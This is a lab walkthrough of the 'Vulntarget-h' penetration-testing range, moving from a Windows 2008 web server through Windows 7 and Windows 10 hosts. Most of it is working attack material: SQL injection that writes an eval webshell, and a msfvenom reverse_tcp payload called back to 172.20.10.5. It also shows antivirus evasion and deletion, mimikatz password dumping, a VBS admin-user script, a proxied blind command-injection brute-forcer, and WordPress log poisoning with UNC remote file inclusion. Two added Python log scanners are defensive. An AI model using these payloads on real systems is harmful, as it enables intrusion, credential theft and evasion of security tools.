Vulntarget-h

win2008

Start by probing the service on port 80.

Upload a one-liner webshell through the injection:

```
/index.aspx?user_id=1;declare @f int,@g int;
exec sp_oacreate 'Scripting.FileSystemObject',@f output;
EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\edrfgyhujikopl\tx.aspx',1;
EXEC sp_oamethod @f,'WriteLine',null,'<%@ Page Language="Jscript"%><%var a = "un";var b = "safe";Response.Write(eval(Request.Item["z"],a%abb));%>';
```

It turns out to be a low-privilege IIS account, and the host has two NICs.

Using tasklist together with an online AV process identifier, found that 360 is running.

https://saucer-man.com/avlist/index.html

The question now is how to bypass 360 and get a session.

Found an article; following it along gets an msf session.

https://zhuanlan.zhihu.com/p/550275126

Generate the payload with msf:

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.20.10.5 LPORT=60001 -f psh-reflection > shell.ps1
```

Then drop the payload into the temp directory.

Trigger the reverse shell.

The callback is triggered through the same injection point:

```
http://172.20.10.5/?user_id=1;
declare @o int;
exec sp_oacreate 'wscript.shell',@o out;
exec sp_oamethod @o,'run',null,'sqlps -ExecutionPolicy bypass -File c:\windows\temp\shell.ps1';
```
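
As an added defender's example (not code from the original post), the following Python scans constructed IIS W3C log lines for the shape of the two injections above: a stacked query (`;declare` / `;exec`) that reaches `sp_oacreate` / `sp_oamethod`. The log field layout, the sample lines and the severity scheme are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines: date time s-ip cs-method cs-uri-stem cs-uri-query sc-status
# (sample data, not captured from the lab above).
SAMPLE_IIS_LINES = [
    "2023-12-04 15:10:01 192.168.153.4 GET /index.aspx user_id=1 200",
    "2023-12-04 15:10:07 192.168.153.4 GET /index.aspx user_id=1;declare+@f+int;exec+sp_oacreate+'Scripting.FileSystemObject',@f+output; 500",
    "2023-12-04 15:12:30 192.168.153.4 GET /index.aspx user_id=1;declare+@o+int;exec+sp_oacreate+'wscript.shell',@o+out;exec+sp_oamethod+@o,'run',null,'sqlps+-File+c:\\windows\\temp\\x.ps1'; 200",
    "2023-12-04 15:13:00 192.168.153.4 GET /search.aspx q=sp_oacreate+documentation 200",
]

# OLE Automation and command-execution procedures a web app's SQL login should never be able to reach.
# Server-side hardening for the same risk: EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
OLE_PROCS = re.compile(r"\b(sp_oacreate|sp_oamethod|sp_oagetproperty|sp_oasetproperty|xp_cmdshell)\b", re.I)
# A stacked query: statement terminator followed by DECLARE/EXEC, the shape of the injections above.
STACKED = re.compile(r";\s*(?:declare|exec(?:ute)?)\b", re.I)

def parse_iis_line(line):
    parts = line.split(" ")
    if len(parts) != 7:
        return None
    date, time, s_ip, method, stem, query, status = parts
    return {"time": f"{date} {time}", "method": method, "stem": stem, "query": query, "status": status}

def inspect_query(query):
    """Decode cs-uri-query and grade it: high = OLE/xp_ procedure inside a stacked query, low = keyword only."""
    decoded = unquote_plus(query)
    procs = sorted({m.group(1).lower() for m in OLE_PROCS.finditer(decoded)})
    stacked = bool(STACKED.search(decoded))
    severity = "high" if procs and stacked else ("low" if procs else None)
    return {"decoded": decoded, "procs": procs, "stacked": stacked, "severity": severity}

def scan_iis(lines):
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        verdict = inspect_query(rec["query"])
        if verdict["severity"]:
            hits.append({**rec, **verdict})
    return hits

if __name__ == "__main__":
    for h in scan_iis(SAMPLE_IIS_LINES):
        print(h["severity"], h["time"], h["stem"], h["decoded"])
```

The keyword-only "low" grade keeps a search term like the fourth line from paging anyone, while the stacked-query form is what the injection above actually needs.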

msf session established.

But don't drop into a shell at this point, or 360 will still block it.

Just migrate into another process.

Tried shutting down 360; the session dropped as soon as I got to turning off active defense.

Tried dumping passwords with mimikatz (kiwi).

Got the admin password.

Tried creating a user and enabling 3389; neither worked.

So I used the VBS script from the writeup to create a user:

```vbscript
' Create local user tx with the given password and add it to the Administrators group via ADSI (WinNT provider)
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","tx")
od.SetPassword "pass!@#!23"
od.SetInfo
Set of=GetObject(os&"/tx,user")
oe.add os&"/tx"
```

Running `wscript 1.vbs` created the user tx with admin rights.

Like an idiot, only now did I notice 3389 was already open:

```cmd
netstat -an | findstr :3389
```

The first step after landing is of course to kill that damn 360.

Then turn off the firewall.

Got ruthless and just deleted 360 outright; that thing is a real pain.

Then CS came online.

windows7

Found two subnets.

Ran a full fscan sweep:

```
(icmp) Target '192.168.153.4' is alive
(icmp) Target '192.168.153.3' is alive
(icmp) Target '192.168.153.128' is alive
icmp alive hosts len is: 3
192.168.153.128:139 open
192.168.153.4:80 open
192.168.153.3:80 open
192.168.153.4:139 open
192.168.153.128:135 open
192.168.153.4:135 open
192.168.153.128:445 open
192.168.153.4:445 open
192.168.153.3:3306 open
192.168.153.3:7680 open

[12/04 15:14:22] [+] received output:
alive ports len is: 10
start vulscan
NetInfo:
[*]192.168.153.4
[->]WIN-7DSM1JVE9PO
[->]172.20.10.5
[->]192.168.153.4
[->]240e:431:1220:95d9:9190:1903:c61e:297b
[->]240e:431:1220:7975:9190:1903:c61e:297b
[+] 192.168.153.4 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
NetInfo:
[*]192.168.153.128
[->]WIN-HF4NQED9HKF
[->]192.168.153.128
[*] 192.168.153.128 __MSBROWSE__\WIN-HF4NQED9HKF Windows 7 Enterprise 7601 Service Pack 1
[*] 192.168.153.4 WORKGROUP\WIN-7DSM1JVE9PO Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 192.168.153.128 (Windows 7 Enterprise 7601 Service Pack 1)
[*] WebTitle:http://192.168.153.4 code:200 len:683 title:SiteGenerator - DataValidation : SQL Injection : Basic

[12/04 15:14:23] [+] received output:
[*] WebTitle:http://192.168.153.3 code:200 len:64 title:<script>xss<script> – 又一个WordPress站点

[12/04 15:14:32] [+] received output:
已完成 12/12
scan end
```

This shows that 153.3 is running WordPress.

Set up a SOCKS proxy with frp.

153.3 was too slow to load, so I changed its IP to 153.129.

wpscan turned up CVE-2016-10956:

https://www.exploit-db.com/exploits/40290

Noticed that the generated log files are named access.log.xxxxxx,

where xxxx is the timestamp for 8 AM of each day.

Run:

```bash
proxychains curl -v 'http://192.168.153.129/<?=phpinfo()?>'
```

phpinfo() was echoed back successfully.

But there is no way to get a shell for now.

Moving on to the 153.128 machine.

A CTF-style challenge hit me in the face and woke up some dead memories.

But I didn't solve it.

So I used the script from the range's writeup:

```python
import requests
import string
import socket
import socks

socks.set_default_proxy(socks.SOCKS5, "82.156.174.51", 23333)  # replace with your own first-hop frp proxy
socket.socket = socks.socksocket

command = "type C:\\phpstudy_pro\\COM\\a.txt >C:\\phpstudy_pro\\a"  # read the hint text and write it unchanged to C:\phpstudy_pro\a
base64 = "certutil -encode C:\\phpstudy_pro\\a C:\\phpstudy_pro\\b"  # -encode: base64-encode the file, so b holds a's content in base64
base64_clean = "findstr /V \"^---\" C:\\phpstudy_pro\\b > C:\\phpstudy_pro\\c"  # findstr /V prints only the lines that do NOT match (drops the certutil header/footer)
echo_b_bat = "echo @echo off>>C:\\phpstudy_pro\\b.bat"
echo_b_bat2 = "echo (for /f \"delims=\" %%i in ('type \"C:\\phpstudy_pro\\c\"') do (set /p =%%i^<nul))^>\"C:\\phpstudy_pro\\d\">>C:\\phpstudy_pro\\b.bat"
start = "C:\\phpstudy_pro\\b.bat"
echo_a_bat = "echo @echo off>>C:\\phpstudy_pro\\a.bat"
echo_a_bat1 = "echo findstr /b %1 \"C:\\phpstudy_pro\\d\">>C:\\phpstudy_pro\\a.bat"
echo_a_bat2 = "echo IF ERRORLEVEL 1 echo a^&^&goto end >>C:\\phpstudy_pro\\a.bat"  # on failure, print a and jump to end
echo_a_bat3 = "echo IF ERRORLEVEL 0 ping 127.0.0.1>>C:\\phpstudy_pro\\a.bat"  # on success, output ping's result
echo_end = "echo :end>>C:\\phpstudy_pro\\a.bat"
cmd = [command, base64, base64_clean, echo_b_bat, echo_b_bat2, start, echo_a_bat, echo_a_bat1, echo_a_bat2, echo_a_bat3, echo_end]
url = "http://192.168.153.128/"
for i in cmd:
    data = {
        "shell": i
    }
    requests.post(url, data=data)
print("[+]init success")
bp = string.ascii_letters + string.digits + "+/="  # ascii_letters is a-z and A-Z, digits is 0-9; bp is the alphabet
cmd_base64 = ""
for i in range(1, 65535):
    for s in bp:
        data = {
            "shell": "C:\\phpstudy_pro\\a.bat " + cmd_base64 + s
        }
        response = requests.post(url, data=data)
        time = response.elapsed.total_seconds()
        if time > 3:  # a slow response means the prefix matched and ping ran
            cmd_base64 += s
            print(cmd_base64)
            break
```

This yields ZHN1aWphZGRqc2Z2b3MucGhw, which base64-decodes to dsuijaddjsfvos.php.

Connected with AntSword directly.

It's a low-privilege user.

Huorong is present.

Luckily I have a 🐎 that gets past Huorong, hehe.

Session established.

windows10

RDP in directly.

Now try using an SMB share.

Create an RFI folder on C: and put phpinfo in it.

Then set the folder's properties: Share -> Everyone -> Read/Write.

Then turn off password-protected sharing.

Now phpinfo.php can be included:

```
http://192.168.153.129/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=\\192.168.153.128\RFI\phpinfo.php
```
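
An added defender's example, not part of the original walkthrough: Python that classifies the value handed to the plugin's `pl` parameter in constructed Apache log lines, flagging UNC paths (which PHP on Windows opens as ordinary files, so `allow_url_include=Off` does not stop them), URL stream wrappers and traversal, and also the PHP-tag-in-URI log-poisoning shape of the curl request earlier on the page. The log lines and the values other than the page's own `pl` path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache "combined" log lines (sample data, not captured from the lab above).
SAMPLE_APACHE_LINES = [
    '192.168.153.3 - - [04/Dec/2023:15:20:01 +0800] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=campaign.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.153.3 - - [04/Dec/2023:15:21:10 +0800] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=\\\\192.168.153.128\\RFI\\phpinfo.php HTTP/1.1" 200 80000 "-" "curl/7.88"',
    '192.168.153.3 - - [04/Dec/2023:15:22:00 +0800] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://example.invalid/x.txt HTTP/1.1" 500 0 "-" "curl/7.88"',
    '192.168.153.3 - - [04/Dec/2023:15:23:00 +0800] "GET /%3C?=phpinfo()?%3E HTTP/1.1" 404 200 "-" "curl/7.88"',
]

REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)

def classify_include_target(value):
    """Classify a value that reaches a PHP include()-style sink."""
    v = value.strip()
    # UNC paths (\\host\share or //host/share) are opened by PHP on Windows through the
    # plain-file wrapper, so allow_url_include=Off and allow_url_fopen=Off do not block them.
    if v.startswith("\\\\") or v.startswith("//"):
        return "unc"
    if re.match(r"[a-z][a-z0-9+.\-]*://", v, re.I):
        return "url"        # http://, ftp://, php://, data:// ... stream wrappers
    if "../" in v or "..\\" in v:
        return "traversal"
    return "plain"          # still needs an allowlist: the plugin includes whatever it is given

def scan_apache(lines):
    """One finding per suspicious request: UNC/URL/traversal include values or PHP tags in the URI."""
    findings = []
    for line in lines:
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        target = m.group(1)
        if PHP_TAG.search(unquote(target)):
            findings.append({"target": target, "kind": "php_tag_in_uri", "param": None})
            continue
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_include_target(value)
            if kind != "plain":
                findings.append({"target": target, "kind": kind, "param": name})
    return findings

if __name__ == "__main__":
    for f in scan_apache(SAMPLE_APACHE_LINES):
        print(f["kind"], f["param"], f["target"])
```

Blocking outbound SMB (TCP 445) from the web server is the network-side fix for the UNC case, since the PHP settings alone do not cover it.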

Then write a one-liner webshell into that folder and connect.

The account is a member of the local Administrators group.

Then bring it online in CS.